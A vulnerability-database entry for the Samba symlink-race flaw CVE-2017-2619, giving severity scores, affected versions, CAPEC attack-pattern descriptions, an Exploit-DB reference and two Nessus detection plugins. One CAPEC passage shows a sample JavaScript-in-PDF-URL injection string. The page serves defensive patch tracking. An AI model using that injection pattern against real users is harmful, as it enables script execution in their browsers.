Vulnerabilities > CVE-2017-2619 - Link Following vulnerability in multiple products

CVSS 7.5 - HIGH

Attack vector

NETWORK

Attack complexity

HIGH

Privileges required

LOW

Confidentiality impact

HIGH

Integrity impact

HIGH

Availability impact

HIGH

network

high complexity

nessus

exploit available

NVD

Published: 2018-03-12

Updated: 2022-08-29

Summary

Samba before versions 4.6.1, 4.5.7 and 4.4.11 are vulnerable to a malicious client using a symlink race to allow access to areas of the server file system not exported under the share definition.

Vulnerable Configurations

Part	Description	Count
Application	Samba Samba Samba 4.5.0 Samba Samba 4.5.1 Samba Samba 4.5.2 Samba Samba 4.5.3 Samba Samba 4.5.4 Samba Samba 4.5.5 Samba Samba 4.5.6 Samba Samba 4.6.0 Samba Samba - Samba Samba 1.9.17 Samba Samba 1.9.18 Samba Samba 2.0 Samba Samba 2.0.0 Samba Samba 2.0.1 Samba Samba 2.0.2 Samba Samba 2.0.3 Samba Samba 2.0.4 Samba Samba 2.0.5 Samba Samba 2.0.5A Samba Samba 2.0.6 Samba Samba 2.0.7 Samba Samba 2.0.8 Samba Samba 2.0.9 Samba Samba 2.0.10 Samba Samba 2.2 Samba Samba 2.2.0 Samba Samba 2.2.0A Samba Samba 2.2.1 Samba Samba 2.2.1A Samba Samba 2.2.2 Samba Samba 2.2.3 Samba Samba 2.2.3A Samba Samba 2.2.4 Samba Samba 2.2.5 Samba Samba 2.2.6 Samba Samba 2.2.7 Samba Samba 2.2.7A Samba Samba 2.2.8 Samba Samba 2.2.8A Samba Samba 2.2.9 Samba Samba 2.2.10 Samba Samba 2.2.11 Samba Samba 2.2.12 Samba Samba 2.2A Samba Samba 2.18.3 Samba Samba 3.0 Samba Samba 3.0.0 Samba Samba 3.0.1 Samba Samba 3.0.2 Samba Samba 3.0.2A Samba Samba 3.0.3 Samba Samba 3.0.4 Samba Samba 3.0.5 Samba Samba 3.0.6 Samba Samba 3.0.7 Samba Samba 3.0.8 Samba Samba 3.0.9 Samba Samba 3.0.10 Samba Samba 3.0.11 Samba Samba 3.0.12 Samba Samba 3.0.13 Samba Samba 3.0.14 Samba Samba 3.0.14A Samba Samba 3.0.15 Samba Samba 3.0.16 Samba Samba 3.0.17 Samba Samba 3.0.18 Samba Samba 3.0.19 Samba Samba 3.0.20 Samba Samba 3.0.20A Samba Samba 3.0.20B Samba Samba 3.0.21 Samba Samba 3.0.21A Samba Samba 3.0.21B Samba Samba 3.0.21C Samba Samba 3.0.22 Samba Samba 3.0.23 Samba Samba 3.0.23A Samba Samba 3.0.23B Samba Samba 3.0.23C Samba Samba 3.0.23D Samba Samba 3.0.24 Samba Samba 3.0.25 Samba Samba 3.0.25A Samba Samba 3.0.25B Samba Samba 3.0.25C Samba Samba 3.0.26 Samba Samba 3.0.26A Samba Samba 3.0.27 Samba Samba 3.0.28 Samba Samba 3.0.29 Samba Samba 3.0.30 Samba Samba 3.0.31 Samba Samba 3.0.32 Samba Samba 3.0.33 Samba Samba 3.0.34 Samba Samba 3.0.35 Samba Samba 3.0.36 Samba Samba 3.0.37 Samba Samba 3.1 Samba Samba 3.1.0 Samba Samba 3.2.0 Samba Samba 3.2.1 Samba Samba 3.2.2 Samba Samba 3.2.3 Samba Samba 3.2.4 Samba Samba 3.2.5 Samba Samba 3.2.6 Samba Samba 3.2.7 Samba Samba 3.2.8 Samba Samba 3.2.9 Samba Samba 3.2.10 Samba Samba 3.2.11 Samba Samba 3.2.12 Samba Samba 3.2.13 Samba Samba 3.2.14 Samba Samba 3.2.15 Samba Samba 3.3.0 Samba Samba 3.3.1 Samba Samba 3.3.2 Samba Samba 3.3.3 Samba Samba 3.3.4 Samba Samba 3.3.5 Samba Samba 3.3.6 Samba Samba 3.3.7 Samba Samba 3.3.8 Samba Samba 3.3.9 Samba Samba 3.3.10 Samba Samba 3.3.11 Samba Samba 3.3.12 Samba Samba 3.3.13 Samba Samba 3.3.14 Samba Samba 3.3.15 Samba Samba 3.3.16 Samba Samba 3.4.0 Samba Samba 3.4.1 Samba Samba 3.4.2 Samba Samba 3.4.3 Samba Samba 3.4.4 Samba Samba 3.4.5 Samba Samba 3.4.6 Samba Samba 3.4.7 Samba Samba 3.4.8 Samba Samba 3.4.9 Samba Samba 3.4.10 Samba Samba 3.4.11 Samba Samba 3.4.12 Samba Samba 3.4.13 Samba Samba 3.4.14 Samba Samba 3.4.15 Samba Samba 3.4.16 Samba Samba 3.4.17 Samba Samba 3.5.0 Samba Samba 3.5.1 Samba Samba 3.5.2 Samba Samba 3.5.3 Samba Samba 3.5.4 Samba Samba 3.5.5 Samba Samba 3.5.6 Samba Samba 3.5.7 Samba Samba 3.5.8 Samba Samba 3.5.9 Samba Samba 3.5.10 Samba Samba 3.5.11 Samba Samba 3.5.12 Samba Samba 3.5.13 Samba Samba 3.5.14 Samba Samba 3.5.15 Samba Samba 3.5.16 Samba Samba 3.5.17 Samba Samba 3.5.18 Samba Samba 3.5.19 Samba Samba 3.5.20 Samba Samba 3.5.21 Samba Samba 3.5.22 Samba Samba 3.6.0 Samba Samba 3.6.1 Samba Samba 3.6.2 Samba Samba 3.6.3 Samba Samba 3.6.4 Samba Samba 3.6.5 Samba Samba 3.6.6 Samba Samba 3.6.7 Samba Samba 3.6.8 Samba Samba 3.6.9 Samba Samba 3.6.10 Samba Samba 3.6.11 Samba Samba 3.6.12 Samba Samba 3.6.13 Samba Samba 3.6.14 Samba Samba 3.6.15 Samba Samba 3.6.16 Samba Samba 3.6.17 Samba Samba 3.6.18 Samba Samba 3.6.19 Samba Samba 3.6.20 Samba Samba 3.6.21 Samba Samba 3.6.22 Samba Samba 3.6.23 Samba Samba 3.6.24 Samba Samba 3.6.25 Samba Samba 4.0.0 Samba Samba 4.0.1 Samba Samba 4.0.2 Samba Samba 4.0.3 Samba Samba 4.0.4 Samba Samba 4.0.5 Samba Samba 4.0.6 Samba Samba 4.0.7 Samba Samba 4.0.8 Samba Samba 4.0.9 Samba Samba 4.0.10 Samba Samba 4.0.11 Samba Samba 4.0.12 Samba Samba 4.0.13 Samba Samba 4.0.14 Samba Samba 4.0.15 Samba Samba 4.0.16 Samba Samba 4.0.17 Samba Samba 4.0.18 Samba Samba 4.0.19 Samba Samba 4.0.20 Samba Samba 4.0.21 Samba Samba 4.0.22 Samba Samba 4.0.23 Samba Samba 4.0.24 Samba Samba 4.0.25 Samba Samba 4.0.26 Samba Samba 4.1.0 Samba Samba 4.1.1 Samba Samba 4.1.2 Samba Samba 4.1.3 Samba Samba 4.1.4 Samba Samba 4.1.5 Samba Samba 4.1.6 Samba Samba 4.1.7 Samba Samba 4.1.8 Samba Samba 4.1.9 Samba Samba 4.1.10 Samba Samba 4.1.11 Samba Samba 4.1.12 Samba Samba 4.1.13 Samba Samba 4.1.14 Samba Samba 4.1.15 Samba Samba 4.1.16 Samba Samba 4.1.17 Samba Samba 4.1.18 Samba Samba 4.1.19 Samba Samba 4.1.20 Samba Samba 4.1.21 Samba Samba 4.1.22 Samba Samba 4.1.23 Samba Samba 4.2.0 Samba Samba 4.2.1 Samba Samba 4.2.2 Samba Samba 4.2.3 Samba Samba 4.2.4 Samba Samba 4.2.5 Samba Samba 4.2.6 Samba Samba 4.2.7 Samba Samba 4.2.8 Samba Samba 4.2.9 Samba Samba 4.2.10 Samba Samba 4.2.11 Samba Samba 4.2.12 Samba Samba 4.2.13 Samba Samba 4.2.14 Samba Samba 4.3.0 Samba Samba 4.3.1 Samba Samba 4.3.2 Samba Samba 4.3.3 Samba Samba 4.3.4 Samba Samba 4.3.5 Samba Samba 4.3.6 Samba Samba 4.3.7 Samba Samba 4.3.8 Samba Samba 4.3.9 Samba Samba 4.3.10 Samba Samba 4.3.11 Samba Samba 4.3.12 Samba Samba 4.3.13 Samba Samba 4.4.0 Samba Samba 4.4.1 Samba Samba 4.4.2 Samba Samba 4.4.3 Samba Samba 4.4.4 Samba Samba 4.4.5 Samba Samba 4.4.6 Samba Samba 4.4.7 Samba Samba 4.4.8 Samba Samba 4.4.9 Samba Samba 4.4.10 Samba Samba 4.4.11	370
OS	Redhat Redhat Enterprise Linux 7.0 Redhat Enterprise Linux 6.0	2
OS	Debian Debian Debian Linux 8.0	1

Common Weakness Enumeration (CWE)

CWE-59 - Improper Link Resolution Before File Access ('Link Following')

Common Attack Pattern Enumeration and Classification (CAPEC)

Symlink Attack
An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.
Accessing, Modifying or Executing Executable Files
An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
Manipulating Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Exploit-Db

description	Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory. CVE-2017-2619. Remote exploit for Multiple platform
file	exploits/multiple/remote/41740.txt
id	EDB-ID:41740
last seen	2017-03-27
modified	2017-03-27
platform	multiple
port
published	2017-03-27
reporter	Exploit-DB
source	https://www.exploit-db.com/download/41740/
title	Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
type	remote

Nessus

NASL family	Virtuozzo Local Security Checks
NASL id	VIRTUOZZO_VZLSA-2017-2789.NASL
description	An update for samba is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * It was found that samba did not enforce
last seen	2020-06-01
modified	2020-06-02
plugin id	119226
published	2018-11-27
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/119226
title	Virtuozzo 6 : libsmbclient / libsmbclient-devel / samba / etc (VZLSA-2017-2789)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(119226); script_version("1.2"); script_cvs_date("Date: 2019/04/05 23:25:09"); script_cve_id( "CVE-2017-12150", "CVE-2017-12163", "CVE-2017-2619" ); script_name(english:"Virtuozzo 6 : libsmbclient / libsmbclient-devel / samba / etc (VZLSA-2017-2789)"); script_summary(english:"Checks the rpm output for the updated package."); script_set_attribute(attribute:"synopsis", value: "The remote Virtuozzo host is missing a security update."); script_set_attribute(attribute:"description", value: "An update for samba is now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions. (CVE-2017-2619) * It was found that samba did not enforce 'SMB signing' when certain configuration options were enabled. A remote attacker could launch a man-in-the-middle attack and retrieve information in plain-text. (CVE-2017-12150) * An information leak flaw was found in the way SMB1 protocol was implemented by Samba. A malicious client could use this flaw to dump server memory contents to a file on the samba share or to a shared printer, though the exact area of server memory cannot be controlled by the attacker. (CVE-2017-12163) Red Hat would like to thank the Samba project for reporting CVE-2017-2619 and CVE-2017-12150 and Yihan Lian and Zhibin Hu (Qihoo 360 GearTeam), Stefan Metzmacher (SerNet), and Jeremy Allison (Google) for reporting CVE-2017-12163. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619; and Stefan Metzmacher (SerNet) as the original reporter of CVE-2017-12150. Note that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."); # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-2789.json script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?12657de1"); script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2017:2789"); script_set_attribute(attribute:"solution", value: "Update the affected libsmbclient / libsmbclient-devel / samba / etc package."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"patch_publication_date", value:"2017/09/21"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:libsmbclient"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:libsmbclient-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-doc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-domainjoin-gui"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-glusterfs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-swat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-winbind"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-winbind-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-winbind-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:virtuozzo:virtuozzo:samba-winbind-krb5-locator"); script_set_attribute(attribute:"cpe", value:"cpe:/o:virtuozzo:virtuozzo:6"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/11/27"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Virtuozzo Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Virtuozzo/release", "Host/Virtuozzo/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/Virtuozzo/release"); if (isnull(release) \|\| "Virtuozzo" >!< release) audit(AUDIT_OS_NOT, "Virtuozzo"); os_ver = pregmatch(pattern: "Virtuozzo Linux release ([0-9]+\.[0-9])(\D\|$)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Virtuozzo"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Virtuozzo 6.x", "Virtuozzo " + os_ver); if (!get_kb_item("Host/Virtuozzo/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Virtuozzo", cpu); flag = 0; pkgs = ["libsmbclient-3.6.23-45.vl6", "libsmbclient-devel-3.6.23-45.vl6", "samba-3.6.23-45.vl6", "samba-client-3.6.23-45.vl6", "samba-common-3.6.23-45.vl6", "samba-doc-3.6.23-45.vl6", "samba-domainjoin-gui-3.6.23-45.vl6", "samba-glusterfs-3.6.23-45.vl6", "samba-swat-3.6.23-45.vl6", "samba-winbind-3.6.23-45.vl6", "samba-winbind-clients-3.6.23-45.vl6", "samba-winbind-devel-3.6.23-45.vl6", "samba-winbind-krb5-locator-3.6.23-45.vl6"]; foreach (pkg in pkgs) if (rpm_check(release:"Virtuozzo-6", reference:pkg)) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "libsmbclient / libsmbclient-devel / samba / etc"); }

NASL family	CentOS Local Security Checks
NASL id	CENTOS_RHSA-2017-1265.NASL
description	An update for samba is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) * A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619.
last seen	2020-06-01
modified	2020-06-02
plugin id	100329
published	2017-05-23
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/100329
title	CentOS 7 : samba (CESA-2017:1265)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2017:1265 and # CentOS Errata and Security Advisory 2017:1265 respectively. # include("compat.inc"); if (description) { script_id(100329); script_version("3.13"); script_cvs_date("Date: 2019/12/31"); script_cve_id("CVE-2016-2125", "CVE-2016-2126", "CVE-2017-2619"); script_xref(name:"RHSA", value:"2017:1265"); script_name(english:"CentOS 7 : samba (CESA-2017:1265)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote CentOS host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "An update for samba is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Samba is an open source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fix(es) : * It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users. (CVE-2016-2125) * A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process. (CVE-2016-2126) * A race condition was found in samba server. A malicious samba client could use this flaw to access files and directories, in areas of the server file system not exported under the share definitions. (CVE-2017-2619) Red Hat would like to thank the Samba project for reporting CVE-2017-2619. Upstream acknowledges Jann Horn (Google) as the original reporter of CVE-2017-2619." ); # https://lists.centos.org/pipermail/centos-announce/2017-May/022412.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?a0389580" ); script_set_attribute( attribute:"solution", value:"Update the affected samba packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-2619"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:ctdb"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:ctdb-tests"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:libsmbclient"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:libsmbclient-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:libwbclient"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:libwbclient-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-client"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-client-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-common-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-common-tools"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-dc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-dc-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-krb5-printing"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-pidl"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-python"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-test"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-test-libs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-vfs-glusterfs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-winbind"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-winbind-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-winbind-krb5-locator"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:samba-winbind-modules"); script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/11"); script_set_attribute(attribute:"patch_publication_date", value:"2017/05/22"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/23"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"CentOS Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/CentOS/release"); if (isnull(release) \|\| "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS"); os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 7.x", "CentOS " + os_ver); if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu); flag = 0; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"ctdb-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"ctdb-tests-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"libsmbclient-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"libsmbclient-devel-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"libwbclient-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"libwbclient-devel-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-client-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-client-libs-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-common-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-common-libs-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-common-tools-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-dc-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-dc-libs-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-devel-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-krb5-printing-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-libs-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-pidl-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-python-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-test-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-test-libs-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-vfs-glusterfs-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-winbind-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-winbind-clients-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-winbind-krb5-locator-4.4.4-13.el7_3")) flag++; if (rpm_check(release:"CentOS-7", cpu:"x86_64", reference:"samba-winbind-modules-4.4.4-13.el7_3")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_WARNING, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc"); }

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2017-1104.NASL
